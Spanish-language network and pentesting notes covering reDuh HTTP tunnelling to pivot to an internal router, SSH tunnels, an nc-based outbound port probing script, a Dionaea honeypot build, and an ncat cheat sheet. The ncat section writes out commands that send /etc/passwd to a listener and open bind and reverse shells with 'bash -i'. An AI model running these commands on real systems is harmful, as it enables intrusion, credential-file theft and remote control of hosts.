# Reduh

Introducción

Utilizamos telnet para conectarnos a un router interno y pivotamos en un servidor web.
El tráfico telnet está encapsulado por un túnel HTTP entre local y servidor.
El router recibe la conexión telnet desde la @ip de servidor.

Reduh

Ejecución
local# java -jar reDuhClient.jar http://servidor/reDuh.php
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from servidor:80/reDuh.php.  Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
local# ncat local 1010
Welcome to the reDuh command line
>>[createTunnel]1234:router:23
 Successfully bound locally to port 1234. Awaiting connections.

>>
local# telnet local 1234

# Túneles sobre SSH

Introducción

Utilizamos telnet para conectarnos a un router interno pero antes pivotamos en un servidor SSH.
El tráfico telnet está cifrado por un túnel SSH entre local y servidor.
El router recibe la conexión telnet desde la @ip de servidor.

Ejecución estática
local# ssh -L 1234:router:23 -f -N usuario@servidor
local# telnet local 1234
Ejecución dinámica (SOCKS)
local# ssh -D 1080 -f -N usuario@servidor
local# cat /etc/tsocks.conf | grep -v -e ^# -e ^$
server = 127.0.0.1
server_type = 5
server_port = 1080
local# tsocks telnet router 23

# Opa

Introducción

Para conocer los puertos abiertos de salida a Internet ejecutaremos el script opa en local y escucharemos con tcpdump en la máquina remota.
remoto# stdbuf -o0 \
tcpdump -tni eth0 src net 82.81.233.0/24 2> /dev/null \
| awk -W interactive '{print $2,$3,$4}'
local# cat opa
#!/bin/bash
#
# NAME
#       opa - Outbound Port Agent
#
# SYNOPSIS
#       ./opa remote_ip from_port to_port [udp_mode]
#
# EXEMPLE
#       ./opa 79.159.199.15 1 65535
#       ./opa 79.159.199.15 1 1024 -u

ip=$1
from=$2
to=$3
udp=$4
counter=0

#echo "Checked ports:"
for port in `seq $from $to`
do
 if [ $counter -eq 9 ]; then
  killall nc 2> /dev/null
#  echo $port
  counter=0
 else
#  echo -n "$port, "
  nc $udp -p $port $ip $port 2> /dev/null &
  let "counter += 1"
 fi
done
killall nc 2> /dev/null

local# ./opa 79.159.199.15 1 65535

# Instalar dionaea

Información

Dionaea

Instalación
# cat /etc/lsb-release | grep DESC
DISTRIB_DESCRIPTION="Ubuntu 10.10"
# cd
# ### Some packages
# apt-get install libudns-dev \
libglib2.0-dev \
libssl-dev \
libcurl4-openssl-dev \
libreadline-dev \
libsqlite3-dev \
python-dev \
libtool \
automake \
autoconf \
build-essential \
subversion \
git-core \
flex \
bison \
pkg-config
# mkdir /opt/dionaea
# mkdir dionaea
# cd dionaea
# ### liblcfg
# git clone git://git.carnivore.it/liblcfg.git liblcfg
# cd liblcfg/code
# autoreconf -vi
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# cd ..
# ### libemu
# git clone git://git.carnivore.it/libemu.git libemu
# cd libemu
# autoreconf -vi
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# ### libev
# wget http://dist.schmorp.de/libev/Attic/libev-3.9.tar.gz
# tar xfz libev-3.9.tar.gz
# cd libev-3.9
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# ### cython
# wget http://cython.org/release/Cython-0.12.1.tar.gz
# tar xfz Cython-0.12.1.tar.gz
# cd Cython-0.12.1       
# python setup.py build
# sudo python setup.py install
# cd ..
# ### sqlite3
# apt-get install sqlite3
# ### python3
# wget http://python.org/ftp/python/3.1.2/Python-3.1.2.tgz
# tar xfz Python-3.1.2.tgz
# cd Python-3.1.2
# ./configure --enable-shared \
--prefix=/opt/dionaea \
--with-computed-gotos \
--enable-ipv6 \
LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/"
# make
# make install
# cd ..
# ### libxml2
# apt-get install libxml2-dev
# ### libxslt
# apt-get install libxslt1-dev
# ### lxml
# wget http://codespeak.net/lxml/lxml-2.2.6.tgz
# tar xfz lxml-2.2.6.tgz
# cd lxml-2.2.6
# /opt/dionaea/bin/2to3 -w src/lxml/html/_diffcommand.py
# /opt/dionaea/bin/2to3 -w src/lxml/html/_html5builder.py
# /opt/dionaea/bin/python3 setup.py build
# /opt/dionaea/bin/python3 setup.py install
# cd ..
# ### c-ares
# wget http://c-ares.haxx.se/c-ares-1.7.3.tar.gz
# tar xfz c-ares-1.7.3.tar.gz
# cd c-ares-1.7.3
# ./configure --prefix=/opt/dionaea
# make
# make install
# cd ..
# ### curl
# wget http://curl.haxx.se/download/curl-7.20.0.tar.bz2
# tar xfj curl-7.20.0.tar.bz2
# cd curl-7.20.0
# ./configure --prefix=/opt/dionaea --enable-ares=/opt/dionaea
# make
# make install
# cd ..
# ### libpcap
# wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
# tar xfz libpcap-1.1.1.tar.gz
# cd libpcap-1.1.1
# ./configure --prefix=/opt/dionaea
# make
# make install
# cd ..
# ### p0f
# apt-get install p0f
# ### dionaea
# git clone git://git.carnivore.it/dionaea.git dionaea
# cd dionaea
# autoreconf -vi
# ./configure --with-lcfg-include=/opt/dionaea/include/ \
--with-lcfg-lib=/opt/dionaea/lib/ \
--with-python=/opt/dionaea/bin/python3.1 \
--with-cython-dir=/usr/local/bin \
--with-udns-include=/opt/dionaea/include/ \
--with-udns-lib=/opt/dionaea/lib/ \
--with-emu-include=/opt/dionaea/include/ \
--with-emu-lib=/opt/dionaea/lib/ \
--with-gc-include=/usr/include/gc \
--with-ev-include=/opt/dionaea/include \
--with-ev-lib=/opt/dionaea/lib \
--with-nl-include=/opt/dionaea/include \
--with-nl-lib=/opt/dionaea/lib/ \
--with-curl-config=/opt/dionaea/bin/ \
--with-pcap-include=/opt/dionaea/include \
--with-pcap-lib=/opt/dionaea/lib/ \
--with-glib=/opt/dionaea
# make
# make install
# cd ..
Configuración
# cd /opt/dionaea/etc/dionaea
# sed -i 's/^\/\/\t\t\t"p0f"/\t\t\t"p0f"/' dionaea.conf
Ejecución
# cd /opt/dionaea/bin/
# p0f -i any -u root -Q /tmp/p0f.sock -q -l -d -o /tmp/p0f.log
# ./dionaea -l all,-debug -L '*' -D
Visualización
# cd /opt/dionaea/var/dionaea
# sqlite3 logsql.sqlite
sqlite> select count(local_port), local_port
FROM connections
where connection_type='accept'
group by local_port;
9|135
4|445
2|1433
sqlite> .exit

# Ncat

Información

Ncat

Recibir un fichero de un equipo remoto
local# ncat -l 192.168.1.1 1234
remoto# ncat --send-only 192.168.1.1 1234 < /etc/passwd
Recibir un fichero de un equipo remoto (cifrando)
local# ncat --ssl -l 192.168.1.1 1234
remoto# ncat --ssl --send-only 192.168.1.1 1234 < /etc/passwd
Abrir una shell en un equipo remoto
remoto# ncat -l 192.168.1.2 1234 -c "bash -i 2>&1"
local# ncat 192.168.1.2 1234
Recibir una shell de un equipo remoto
local# ncat -l 192.168.1.1 1234
remoto# ncat 192.168.1.1 1234 -c "bash -i 2>&1"
Redirección de puertos con destino fijo
remoto# ncat -l 192.168.1.2 1234 -c "ncat 192.168.1.3 21"
local# ncat 192.168.1.2 1234
Redirección de puertos con destino variable (proxy)
remoto# ncat -l 192.168.1.2 1234 --proxy-type http
local# ncat --proxy 192.168.1.2:1234 192.168.1.3 21
Chat entre dos clientes con control de acceso
servidor# ncat -l 192.168.1.3 1234 --chat -m 2 --allow 192.168.1.0/24
remoto# ncat 192.168.1.3 1234
local# ncat 192.168.1.3 1234